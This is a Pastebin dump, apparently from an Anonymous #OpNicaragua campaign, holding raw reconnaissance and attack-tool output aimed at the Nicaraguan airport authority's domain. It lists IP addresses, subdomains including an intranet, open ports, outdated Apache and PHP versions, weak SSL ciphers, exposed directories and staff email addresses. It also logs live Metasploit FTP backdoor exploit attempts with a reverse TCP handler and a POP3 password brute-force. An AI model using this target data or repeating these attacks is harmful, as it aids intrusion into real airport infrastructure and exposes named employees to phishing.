API tools faq
paste
Advertisement
Guest User

Anonymous #OpNicaragua JTSEC Full Recon #11

a guest
Jul 20th, 2018
387
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.46 KB | None | 0 0
raw download clone embed print report
  1. #######################################################################################################################################
  2. Hostname www.eaai.com.ni ISP Telmex Colombia S.A.
  3. Continent South America Flag
  4. CO
  5. Country Colombia Country Code CO
  6. Region Bogota D.C. Local time 20 Jul 2018 05:42 -05
  7. City Bogotá Postal Code 111311
  8. IP Address 190.85.233.91 Latitude 4.649
  9. Longitude -74.063
  10. #######################################################################################################################################
  11. HostIP:190.212.137.165
  12. HostName:eaai.com.ni
  13.  
  14. Gathered Inet-whois information for 190.212.137.165
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. Gathered Inic-whois information for eaai.com.ni
  19. ---------------------------------------------------------------------------------------------------------------------------------------
  20. Error: Unable to connect - Invalid Host
  21. ERROR: Connection to InicWhois Server ni.whois-servers.net failed
  22. close error
  23.  
  24. Gathered Netcraft information for eaai.com.ni
  25. ---------------------------------------------------------------------------------------------------------------------------------------
  26.  
  27. Retrieving Netcraft.com information for eaai.com.ni
  28. Netcraft.com Information gathered
  29.  
  30. Gathered Subdomain information for eaai.com.ni
  31. ---------------------------------------------------------------------------------------------------------------------------------------
  32. Searching Google.com:80...
  33. HostName:www.eaai.com.ni
  34. HostIP:190.85.233.91
  35. Searching Altavista.com:80...
  36. Found 1 possible subdomain(s) for host eaai.com.ni, Searched 0 pages containing 0 results
  37.  
  38. Gathered E-Mail information for eaai.com.ni
  39. ---------------------------------------------------------------------------------------------------------------------------------------
  40. Searching Google.com:80...
  41. Searching Altavista.com:80...
  42. Found 0 E-Mail(s) for host eaai.com.ni, Searched 0 pages containing 0 results
  43.  
  44. Gathered TCP Port information for 190.212.137.165
  45. ---------------------------------------------------------------------------------------------------------------------------------------
  46.  
  47. Port State
  48.  
  49. 53/tcp open
  50. 80/tcp open
  51. 110/tcp open
  52.  
  53. Portscan Finished: Scanned 150 ports, 7 ports were in state closed
  54.  
  55. #######################################################################################################################################
  56. [i] Scanning Site: https://eaai.com.ni
  57.  
  58.  
  59.  
  60. B A S I C I N F O
  61. =======================================================================================================================================
  62.  
  63.  
  64. [+] Site Title: Empresa Administradora de Aeropuertos Internacionales
  65. [+] IP address: 190.212.137.165
  66. [+] Web Server: Apache/2.0.52 (Red Hat)
  67. [+] CMS: Could Not Detect
  68. [+] Cloudflare: Not Detected
  69. [+] Robots File: Could NOT Find robots.txt!
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76. G E O I P L O O K U P
  77. =======================================================================================================================================
  78.  
  79. [i] IP Address: 190.212.137.165
  80. [i] Country: NI
  81. [i] State: Managua
  82. [i] City: Managua
  83. [i] Latitude: 12.150800
  84. [i] Longitude: -86.268303
  85.  
  86.  
  87.  
  88.  
  89. H T T P H E A D E R S
  90. =======================================================================================================================================
  91.  
  92.  
  93. [i] HTTP/1.1 200 OK
  94. [i] Date: Fri, 20 Jul 2018 10:35:03 GMT
  95. [i] Server: Apache/2.0.52 (Red Hat)
  96. [i] X-Powered-By: PHP/4.3.9
  97. [i] Content-Length: 384
  98. [i] Connection: close
  99. [i] Content-Type: text/html; charset=UTF-8
  100.  
  101.  
  102.  
  103.  
  104. D N S L O O K U P
  105. =======================================================================================================================================
  106.  
  107. ;; Truncated, retrying in TCP mode.
  108. eaai.com.ni. 43200 IN NS ns1.eaai.com.ni.
  109. eaai.com.ni. 43200 IN NS mail1.eaai.com.ni.
  110. eaai.com.ni. 43200 IN TXT "v=spf1 a:ns1.eaai.com.ni -all"
  111. eaai.com.ni. 43200 IN NS ns2.enitel.net.ni.
  112. eaai.com.ni. 43200 IN SOA ns1.eaai.com.ni. root.eaai.com.ni. 2018052301 10800 3600 2419200 3600
  113. eaai.com.ni. 43200 IN NS ns.enitel.net.ni.
  114. eaai.com.ni. 43200 IN A 190.212.137.165
  115. eaai.com.ni. 43200 IN MX 0 ns1.eaai.com.ni.
  116. eaai.com.ni. 43200 IN A 190.212.137.166
  117.  
  118.  
  119.  
  120.  
  121. S U B N E T C A L C U L A T I O N
  122. =======================================================================================================================================
  123.  
  124. Address = 190.212.137.165
  125. Network = 190.212.137.165 / 32
  126. Netmask = 255.255.255.255
  127. Broadcast = not needed on Point-to-Point links
  128. Wildcard Mask = 0.0.0.0
  129. Hosts Bits = 0
  130. Max. Hosts = 1 (2^0 - 0)
  131. Host Range = { 190.212.137.165 - 190.212.137.165 }
  132.  
  133.  
  134.  
  135. N M A P P O R T S C A N
  136. =======================================================================================================================================
  137.  
  138.  
  139. Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-20 10:47 UTC
  140. Nmap scan report for eaai.com.ni (190.212.137.165)
  141. Host is up (0.082s latency).
  142. Other addresses for eaai.com.ni (not scanned): 190.212.137.166
  143. rDNS record for 190.212.137.165: ns1.eaai.com.ni
  144. PORT STATE SERVICE VERSION
  145. 21/tcp filtered ftp
  146. 22/tcp filtered ssh
  147. 23/tcp filtered telnet
  148. 80/tcp open http Apache httpd 2.0.52
  149. 110/tcp open pop3
  150. 143/tcp filtered imap
  151. 443/tcp open ssl/http Apache httpd 2.0.52 ((Red Hat))
  152. 3389/tcp filtered ms-wbt-server
  153. Service Info: Host: ns.eaai.com.ni
  154.  
  155. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  156. Nmap done: 1 IP address (1 host up) scanned in 15.80 seconds
  157.  
  158.  
  159.  
  160. S U B - D O M A I N F I N D E R
  161. =======================================================================================================================================
  162.  
  163.  
  164. [i] Total Subdomains Found : 3
  165.  
  166. [+] Subdomain: ns1.eaai.com.ni
  167. [-] IP: 190.212.137.165
  168.  
  169. [+] Subdomain: web.eaai.com.ni
  170. [-] IP: 190.85.233.91
  171.  
  172. [+] Subdomain: pat.eaai.com.ni
  173. [-] IP: 190.212.137.164
  174. #######################################################################################################################################
  175. [?] Enter the target: https://www.eaai.com.ni/
  176. [!] IP Address : 190.85.233.91
  177. [!] Server: Apache/2.2.3 (CentOS)
  178. [+] Clickjacking protection is not in place.
  179. [+] Operating System : CentOS
  180. [!] www.eaai.com.ni doesn't seem to use a CMS
  181. [+] Honeypot Probabilty: 0%
  182. ---------------------------------------------------------------------------------------------------------------------------------------
  183. [~] Trying to gather whois information for www.eaai.com.ni
  184. [+] Whois information found
  185. [-] Unable to build response, visit https://who.is/whois/www.eaai.com.ni
  186. ---------------------------------------------------------------------------------------------------------------------------------------
  187. PORT STATE SERVICE VERSION
  188. 21/tcp filtered ftp
  189. 22/tcp filtered ssh
  190. 23/tcp filtered telnet
  191. 80/tcp open http Apache httpd 2.2.3
  192. 110/tcp filtered pop3
  193. 143/tcp filtered imap
  194. 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
  195. 3389/tcp filtered ms-wbt-server
  196. ---------------------------------------------------------------------------------------------------------------------------------------
  197.  
  198. [+] DNS Records
  199.  
  200. [+] Host Records (A)
  201. www.eaai.com.niHTTP: (190.85.233.91) AS14080 Telmex S.A. Colombia
  202.  
  203. [+] TXT Records
  204.  
  205. [+] DNS Map: https://dnsdumpster.com/static/map/eaai.com.ni.png
  206.  
  207. [>] Initiating 3 intel modules
  208. [>] Loading Alpha module (1/3)
  209. [>] Beta module deployed (2/3)
  210. [>] Gamma module initiated (3/3)
  211.  
  212.  
  213. [+] Emails found:
  214. ---------------------------------------------------------------------------------------------------------------------------------------
  215. pixel-1532083623873460-web-@www.eaai.com.ni
  216.  
  217. [+] Hosts found in search engines:
  218. ---------------------------------------------------------------------------------------------------------------------------------------
  219. [-] Resolving hostnames IPs...
  220. [+] Virtual hosts:
  221. ---------------------------------------------------------------------------------------------------------------------------------------
  222. [~] Crawling the target for fuzzable URLs
  223. #######################################################################################################################################
  224. Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-20 10:47 UTC
  225. Nmap scan report for eaai.com.ni (190.212.137.165)
  226. Host is up (0.082s latency).
  227. Other addresses for eaai.com.ni (not scanned): 190.212.137.166
  228. rDNS record for 190.212.137.165: ns1.eaai.com.ni
  229. PORT STATE SERVICE VERSION
  230. 21/tcp filtered ftp
  231. 22/tcp filtered ssh
  232. 23/tcp filtered telnet
  233. 80/tcp open http Apache httpd 2.0.52
  234. 110/tcp open pop3
  235. 143/tcp filtered imap
  236. 443/tcp open ssl/http Apache httpd 2.0.52 ((Red Hat))
  237. 3389/tcp filtered ms-wbt-server
  238. Service Info: Host: ns.eaai.com.ni
  239.  
  240. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  241. Nmap done: 1 IP address (1 host up) scanned in 15.39 seconds
  242. #######################################################################################################################################
  243. Start: Fri Jul 20 10:48:00 2018
  244. HOST: whatweb Loss% Snt Last Avg Best Wrst StDev
  245. 1.|-- 45.55.64.253 0.0% 3 11.4 4.4 0.9 11.4 6.0
  246. 2.|-- 138.197.251.16 0.0% 3 0.4 5.4 0.4 14.9 8.2
  247. 3.|-- 138.197.244.32 0.0% 3 1.0 1.0 1.0 1.1 0.0
  248. 4.|-- ix-ae-3-0.tcore1.n75-new-york.as6453.net 0.0% 3 0.9 0.9 0.8 0.9 0.0
  249. 5.|-- if-ae-12-2.tcore2.nto-new-york.as6453.net 0.0% 3 1.1 1.2 1.1 1.3 0.0
  250. 6.|-- be3011.ccr31.jfk05.atlas.cogentco.com 0.0% 3 1.4 1.5 1.4 1.7 0.0
  251. 7.|-- be3294.ccr41.jfk02.atlas.cogentco.com 0.0% 3 1.4 1.5 1.4 1.6 0.0
  252. 8.|-- be2806.ccr41.dca01.atlas.cogentco.com 0.0% 3 8.2 8.3 8.2 8.5 0.0
  253. 9.|-- be2112.ccr41.atl01.atlas.cogentco.com 0.0% 3 18.6 18.7 18.6 18.8 0.0
  254. 10.|-- be3482.ccr21.mia01.atlas.cogentco.com 0.0% 3 32.4 32.4 32.3 32.4 0.0
  255. 11.|-- be3400.ccr21.mia03.atlas.cogentco.com 0.0% 3 33.3 33.4 33.3 33.7 0.0
  256. 12.|-- 38.142.153.74 0.0% 3 58.3 57.6 56.9 58.3 0.0
  257. 13.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  258. 14.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  259. 15.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  260. 16.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  261. 17.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  262. 18.|-- 162-137-212-190.enitel.net.ni 0.0% 3 80.4 80.5 80.4 80.7 0.0
  263. 19.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  264.  
  265. #######################################################################################################################################
  266. Ip Address Status Type Domain Name Server
  267. ---------- ------ ---- ----------- ------
  268. 190.85.233.91 302 alias beta.eaai.com.ni Apache/2.2.3 (CentOS)
  269. 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
  270. 190.85.233.91 302 alias intranet.eaai.com.ni Apache/2.2.3 (CentOS)
  271. 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
  272. 190.212.137.166 301 host mail.eaai.com.ni Apache/2.0.52 (Red Hat)
  273. 190.212.137.166 301 host mail1.eaai.com.ni Apache/2.0.52 (Red Hat)
  274. 190.212.137.165 301 host ns.eaai.com.ni Apache/2.0.52 (Red Hat)
  275. 190.212.137.165 301 host ns1.eaai.com.ni Apache/2.0.52 (Red Hat)
  276. 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
  277. 190.85.233.91 302 alias www.eaai.com.ni Apache/2.2.3 (CentOS)
  278. 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
  279. #######################################################################################################################################
  280. [*] Performing General Enumeration of Domain: eaai.com.ni
  281. [-] DNSSEC is not configured for eaai.com.ni
  282. [*] SOA ns1.eaai.com.ni 190.212.137.165
  283. [*] NS ns2.enitel.net.ni 200.62.64.65
  284. [*] NS ns1.eaai.com.ni 190.212.137.165
  285. [*] NS ns.enitel.net.ni 200.62.64.1
  286. [*] NS mail1.eaai.com.ni 190.212.137.166
  287. [*] MX ns1.eaai.com.ni 190.212.137.165
  288. [*] A eaai.com.ni 190.212.137.165
  289. [*] A eaai.com.ni 190.212.137.166
  290. [*] TXT eaai.com.ni v=spf1 a:ns1.eaai.com.ni -all
  291. [*] Enumerating SRV Records
  292. [-] No SRV Records Found for eaai.com.ni
  293. [+] 0 Records Found
  294. #######################################################################################################################################
  295. [*] Processing domain eaai.com.ni
  296. [+] Getting nameservers
  297. 200.62.64.65 - ns2.enitel.net.ni
  298. 190.212.137.165 - ns1.eaai.com.ni
  299. 200.62.64.1 - ns.enitel.net.ni
  300. 190.212.137.166 - mail1.eaai.com.ni
  301. [-] Zone transfer failed
  302.  
  303. [+] TXT records found
  304. "v=spf1 a:ns1.eaai.com.ni -all"
  305.  
  306. [+] MX records found, added to target list
  307. 0 ns1.eaai.com.ni.
  308.  
  309. [*] Scanning eaai.com.ni for A records
  310. 190.212.137.166 - eaai.com.ni
  311. 190.212.137.165 - eaai.com.ni
  312. 190.85.233.91 - beta.eaai.com.ni
  313. 190.85.233.91 - intranet.eaai.com.ni
  314. 190.212.137.166 - mail.eaai.com.ni
  315. 190.212.137.166 - mail1.eaai.com.ni
  316. 190.212.137.165 - ns.eaai.com.ni
  317. 190.212.137.165 - ns1.eaai.com.ni
  318. 190.85.233.91 - web.eaai.com.ni
  319. 190.85.233.91 - www.eaai.com.ni
  320. #######################################################################################################################################
  321. [+] Emails found:
  322. ------------------
  323. despachodevuelos@eaai.com.ni
  324. webm@eaai.com.ni
  325. comercial@eaai.com.ni
  326. larostegui@eaai.com.ni
  327. rrodriguez@eaai.com.ni
  328. jsaballos@eaai.com.ni
  329. salonvip@eaai.com.ni
  330. blu@eaai.com.ni
  331. emironda@eaai.com.ni
  332. slopezsam@eaai.com.ni
  333. aarellano@eaai.com.ni
  334.  
  335. [+] Hosts found in search engines:
  336. ---------------------------------------------------------------------------------------------------------------------------------------
  337.  
  338. Total hosts: 5
  339.  
  340. [-] Resolving hostnames IPs...
  341.  
  342. ...eaai.com.ni : empty
  343. .eaai.com.ni : empty
  344. mail.eaai.com.ni : 190.212.137.166
  345. mail1.eaai.com.ni : 190.212.137.166
  346. www.eaai.com.ni : 190.85.233.91
  347. #######################################################################################################################################
  348. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  349.  
  350. Connected to 190.212.137.165
  351.  
  352. Testing SSL server eaai.com.ni on port 443 using SNI name eaai.com.ni
  353.  
  354. TLS Fallback SCSV:
  355. Server does not support TLS Fallback SCSV
  356.  
  357. TLS renegotiation:
  358. Insecure session renegotiation supported
  359.  
  360. TLS Compression:
  361. Compression disabled
  362.  
  363. Heartbleed:
  364. TLS 1.2 not vulnerable to heartbleed
  365. TLS 1.1 not vulnerable to heartbleed
  366. TLS 1.0 not vulnerable to heartbleed
  367.  
  368. Supported Server Cipher(s):
  369. Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  370. Accepted TLSv1.0 256 bits AES256-SHA
  371. Preferred SSLv3 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  372. Accepted SSLv3 256 bits AES256-SHA
  373. Accepted SSLv3 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  374. Accepted SSLv3 128 bits AES128-SHA
  375. Accepted SSLv3 128 bits RC4-SHA
  376. Accepted SSLv3 128 bits RC4-MD5
  377. Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA DHE 1024 bits
  378. Accepted SSLv3 112 bits DES-CBC3-SHA
  379. Accepted SSLv3 56 bits EDH-RSA-DES-CBC-SHA DHE 1024 bits
  380. Accepted SSLv3 56 bits DES-CBC-SHA
  381. Accepted SSLv3 40 bits EXP-EDH-RSA-DES-CBC-SHA DHE 512 bits
  382. Accepted SSLv3 40 bits EXP-DES-CBC-SHA RSA 512 bits
  383. Accepted SSLv3 40 bits EXP-RC2-CBC-MD5 RSA 512 bits
  384. Accepted SSLv3 40 bits EXP-RC4-MD5 RSA 512 bits
  385. Preferred SSLv2 128 bits RC2-CBC-MD5
  386. Accepted SSLv2 128 bits RC4-MD5
  387. Accepted SSLv2 112 bits DES-CBC3-MD5
  388. Accepted SSLv2 64 bits RC4-64-MD5
  389. Accepted SSLv2 56 bits DES-CBC-MD5
  390. Accepted SSLv2 40 bits EXP-RC2-CBC-MD5
  391. Accepted SSLv2 40 bits EXP-RC4-MD5
  392.  
  393. SSL Certificate:
  394. Signature Algorithm: sha256WithRSAEncryption
  395. RSA Key Strength: 2048
  396.  
  397. Subject: *.eaai.com.ni
  398. Altnames: DNS:*.eaai.com.ni, DNS:eaai.com.ni
  399. Issuer: Starfield Secure Certificate Authority - G2
  400.  
  401. Not valid before: Aug 5 22:21:00 2017 GMT
  402. Not valid after: Aug 3 22:31:00 2018 GMT
  403. #######################################################################################################################################
  404. [+] searching (sub)domains for eaai.com.ni using built-in wordlist
  405. [+] using maximum random delay of 10 millisecond(s) between requests
  406.  
  407. beta.eaai.com.ni
  408. IP address #1: 190.85.233.91
  409.  
  410. intranet.eaai.com.ni
  411. IP address #1: 190.85.233.91
  412.  
  413. mail.eaai.com.ni
  414. IP address #1: 190.212.137.166
  415.  
  416. ns.eaai.com.ni
  417. IP address #1: 190.212.137.165
  418.  
  419. ns1.eaai.com.ni
  420. IP address #1: 190.212.137.165
  421.  
  422. pv.eaai.com.ni
  423. IP address #1: 165.98.58.22
  424.  
  425. web.eaai.com.ni
  426. IP address #1: 190.85.233.91
  427.  
  428. www.eaai.com.ni
  429. IP address #1: 190.85.233.91
  430.  
  431. #######################################################################################################################################
  432. =======================================================================================================================================
  433. | [*] http://eaai.com.ni/ redirected to http://eaai.com.ni/
  434. | [*] New target is: http://eaai.com.ni/
  435. =======================================================================================================================================
  436. | Domain: http://eaai.com.ni/
  437. | Server: Apache/2.0.52 (Red Hat)
  438. | IP: 190.212.137.165
  439. =======================================================================================================================================
  440. |
  441. | Directory check:
  442. | [+] CODE: 200 URL: http://eaai.com.ni/icons/
  443. =======================================================================================================================================
  444. |
  445. | File check:
  446. | [+] CODE: 200 URL: http://eaai.com.ni/error/HTTP_NOT_FOUND.html.var
  447. | [+] CODE: 200 URL: http://eaai.com.ni/index.php
  448. | [+] CODE: 200 URL: http://eaai.com.ni/mailman/listinfo
  449. | [+] CODE: 200 URL: http://eaai.com.ni/webmail/src/configtest.php
  450. | [+] CODE: 200 URL: http://eaai.com.ni/webmail/src/read_body.php
  451. =======================================================================================================================================
  452.  
  453. | E-mails:
  454. | [+] E-mail Found: mailman@eaai.com.ni
  455. | [+] E-mail Found: dmvega@eaai.com.ni
  456. |######################################################################################################################################
  457. ---------------------------------------------------------------------------------------------------------------------------------------
  458. + Target IP: 190.85.233.91
  459. + Target Hostname: www.eaai.com.ni
  460. + Target Port: 443
  461. ---------------------------------------------------------------------------------------------------------------------------------------
  462. + SSL Info: Subject: /OU=Domain Control Validated/CN=*.eaai.com.ni
  463. Ciphers: DHE-RSA-AES256-SHA
  464. Issuer: /C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, Inc./OU=http://certs.starfieldtech.com/repository//CN=Starfield Secure Certificate Authority - G2
  465. + Start Time: 2018-07-20 11:54:59 (GMT-4)
  466. ---------------------------------------------------------------------------------------------------------------------------------------
  467. + Server: Apache/2.2.3 (CentOS)
  468. + Cookie fc7239472d86929b3f9e2af089868681 created without the secure flag
  469. + Cookie joomsef_lang created without the secure flag
  470. + Cookie joomsef_lang created without the httponly flag
  471. + The anti-clickjacking X-Frame-Options header is not present.
  472. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  473. + Uncommon header 'x-logged-in' found, with contents: False
  474. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  475. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  476. + Server leaks inodes via ETags, header found with file /robots.txt, inode: 6737953, size: 865, mtime: Mon Oct 27 11:48:10 2014
  477. + Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (401)
  478. + Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  479. + Entry '/cli/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  480. + Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  481. + Entry '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  482. + Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  483. + Cookie sj_lifemag_tpl created without the secure flag
  484. + Cookie sj_lifemag_tpl created without the httponly flag
  485. + Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  486. + Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  487. + Entry '/logs/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  488. + Entry '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  489. + Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  490. + Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  491. + Entry '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  492. + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  493. + "robots.txt" contains 15 entries which should be manually viewed.
  494. + Server is using a wildcard certificate: *.eaai.com.ni
  495. + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: Connect failed: ; Connection timed out at /var/lib/nikto/plugins/LW2.pm line 5157.
  496. : Connection timed out
  497. + Scan terminated: 19 error(s) and 27 item(s) reported on remote host
  498. + End Time: 2018-07-20 12:33:23 (GMT-4) (2304 seconds)
  499. ---------------------------------------------------------------------------------------------------------------------------------------
  500. #######################################################################################################################################
  501. dnsenum VERSION:1.2.4
  502.  
  503. ----- eaai.com.ni -----
  504.  
  505.  
  506. Host's addresses:
  507. __________________
  508.  
  509. eaai.com.ni. 55136 IN A 190.212.137.166
  510. eaai.com.ni. 55136 IN A 190.212.137.165
  511.  
  512.  
  513. Name Servers:
  514. ______________
  515.  
  516. mail1.eaai.com.ni. 55151 IN A 190.212.137.166
  517. ns1.eaai.com.ni. 55151 IN A 190.212.137.165
  518. ns.enitel.net.ni. 19689 IN A 200.64.62.1
  519. ns.enitel.net.ni. 19689 IN A 200.62.64.1
  520. ns2.enitel.net.ni. 19689 IN A 200.62.64.65
  521.  
  522.  
  523. Mail (MX) Servers:
  524. ___________________
  525.  
  526. ns1.eaai.com.ni. 55149 IN A 190.212.137.165
  527.  
  528.  
  529. Trying Zone Transfers and getting Bind Versions:
  530. _________________________________________________
  531.  
  532.  
  533. Trying Zone Transfer for eaai.com.ni on mail1.eaai.com.ni ...
  534.  
  535. Trying Zone Transfer for eaai.com.ni on ns1.eaai.com.ni ...
  536.  
  537. Trying Zone Transfer for eaai.com.ni on ns.enitel.net.ni ...
  538.  
  539. Trying Zone Transfer for eaai.com.ni on ns2.enitel.net.ni ...
  540.  
  541. brute force file not specified, bay.
  542. #######################################################################################################################################
  543. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:52 EDT
  544. Nmap scan report for eaai.com.ni (190.212.137.166)
  545. Host is up (0.88s latency).
  546. Other addresses for eaai.com.ni (not scanned): 190.212.137.165
  547. rDNS record for 190.212.137.166: mail1.eaai.com.ni
  548. Not shown: 451 closed ports, 20 filtered ports
  549. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  550. PORT STATE SERVICE
  551. 21/tcp open ftp
  552. 53/tcp open domain
  553. 80/tcp open http
  554. 110/tcp open pop3
  555. 554/tcp open rtsp
  556.  
  557. Nmap done: 1 IP address (1 host up) scanned in 8.51 seconds
  558. #######################################################################################################################################
  559. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:53 EDT
  560. Nmap scan report for eaai.com.ni (190.212.137.166)
  561. Host is up (0.55s latency).
  562. Other addresses for eaai.com.ni (not scanned): 190.212.137.165
  563. rDNS record for 190.212.137.166: mail1.eaai.com.ni
  564.  
  565. PORT STATE SERVICE
  566. 53/udp open domain
  567. 67/udp open|filtered dhcps
  568. 68/udp open|filtered dhcpc
  569. 69/udp open|filtered tftp
  570. 88/udp open|filtered kerberos-sec
  571. 123/udp open|filtered ntp
  572. 137/udp open|filtered netbios-ns
  573. 138/udp open|filtered netbios-dgm
  574. 139/udp open|filtered netbios-ssn
  575. 161/udp open|filtered snmp
  576. 162/udp open|filtered snmptrap
  577. 389/udp open|filtered ldap
  578. 520/udp open|filtered route
  579. 2049/udp open|filtered nfs
  580. #######################################################################################################################################
  581. + -- --=[Port 21 opened... running tests...
  582. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:53 EDT
  583. Nmap scan report for eaai.com.ni (190.212.137.166)
  584. Host is up (0.24s latency).
  585. Other addresses for eaai.com.ni (not scanned): 190.212.137.165
  586. rDNS record for 190.212.137.166: mail1.eaai.com.ni
  587.  
  588. PORT STATE SERVICE VERSION
  589. 21/tcp open ftp?
  590. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  591. Device type: WAP
  592. Running: D-Link embedded, TRENDnet embedded
  593. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp
  594. OS details: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP
  595. Network Distance: 1 hop
  596. RHOST => eaai.com.ni
  597. RHOSTS => eaai.com.ni
  598. [-] eaai.com.ni:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (eaai.com.ni:21).
  599. [*] Exploit completed, but no session was created.
  600. [*] Started reverse TCP double handler on 10.211.1.29:4444
  601. [*] eaai.com.ni:21 - Sending Backdoor Command
  602. [*] Exploit completed, but no session was created.
  603. + -- --=[Port 22 closed... skipping.
  604. + -- --=[Port 23 closed... skipping.
  605. + -- --=[Port 25 closed... skipping.
  606. + -- --=[Port 53 opened... running tests...
  607. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 17:07 EDT
  608. Nmap scan report for eaai.com.ni (190.212.137.165)
  609. Host is up.
  610. Other addresses for eaai.com.ni (not scanned): 190.212.137.166
  611. rDNS record for 190.212.137.165: ns1.eaai.com.ni
  612.  
  613. PORT STATE SERVICE VERSION
  614. 53/tcp filtered domain
  615. Too many fingerprints match this host to give specific OS details
  616.  
  617. Host script results:
  618. | dns-brute:
  619. | DNS Brute-force hostnames:
  620. | info.com.ni - 50.17.205.182
  621. | oracle.com.ni - 156.151.59.19
  622. | cdn.com.ni - 186.1.31.3
  623. |_ forum.com.ni - 54.86.188.65
  624.  
  625. TRACEROUTE (using proto 1/icmp)
  626. HOP RTT ADDRESS
  627. 1 ... 30
  628. #######################################################################################################################################
  629.  
  630. ^ ^
  631. _ __ _ ____ _ __ _ _ ____
  632. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  633. | V V // o // _/ | V V // 0 // 0 // _/
  634. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  635. <
  636. ...'
  637.  
  638. WAFW00F - Web Application Firewall Detection Tool
  639.  
  640. By Sandro Gauci && Wendel G. Henrique
  641.  
  642. Checking http://eaai.com.ni
  643. The site http://eaai.com.ni is behind a Imperva SecureSphere
  644. Number of requests: 9
  645. #######################################################################################################################################
  646.  
  647. wig - WebApp Information Gatherer
  648.  
  649.  
  650. Scanning https://eaai.com.ni...
  651. ______________________ SITE INFO _______________________
  652. IP Title
  653. 190.212.137.165 Empresa Administradora de Ae
  654. 190.212.137.166
  655.  
  656. _______________________ VERSION ________________________
  657. Name Versions Type
  658. Apache 2.0.52 Platform
  659. PHP 4.3.9 Platform
  660. Red Hat Enterprise Linux RHEL-4.8 OS
  661.  
  662. ________________________________________________________
  663. Time: 1.8 sec Urls: 599 Fingerprints: 40401
  664. #######################################################################################################################################
  665. HTTP/1.1 301 Moved Permanently
  666. Date: Fri, 20 Jul 2018 20:58:48 GMT
  667. Server: Apache/2.0.52 (Red Hat)
  668. Location: https://eaai.com.ni/
  669. Connection: close
  670. Content-Type: text/html; charset=iso-8859-1
  671. #######################################################################################################################################
  672. [+] Screenshot saved to /usr/share/sniper/loot/eaai.com.ni/screenshots/eaai.com.ni-port80.jpg
  673. + -- --=[Port 110 opened... running tests...
  674. Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 17:11 EDT
  675. Nmap scan report for eaai.com.ni (190.212.137.165)
  676. Host is up (0.53s latency).
  677. Other addresses for eaai.com.ni (not scanned): 190.212.137.166
  678. rDNS record for 190.212.137.165: ns1.eaai.com.ni
  679.  
  680. PORT STATE SERVICE VERSION
  681. 110/tcp open pop3
  682. | fingerprint-strings:
  683. | GenericLines:
  684. | +OK Server Ready
  685. | -ERR Invalid command
  686. | -ERR Invalid command
  687. | HTTPOptions:
  688. | -ERR Invalid command
  689. | -ERR Invalid command
  690. | Server Ready
  691. | NULL:
  692. |_ +OK Server Ready
  693. | pop3-brute:
  694. | Accounts: No valid accounts found
  695. | Statistics: Performed 351 guesses in 132 seconds, average tps: 2.7
  696. |_ ERROR: Failed to connect.
  697. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  698. SF-Port110-TCP:V=7.70%I=7%D=7/20%Time=5B524FF5%P=x86_64-pc-linux-gnu%r(NUL
  699. SF:L,13,"\+OK\x20Server\x20Ready\x20\r\n")%r(GenericLines,3F,"\+OK\x20Serv
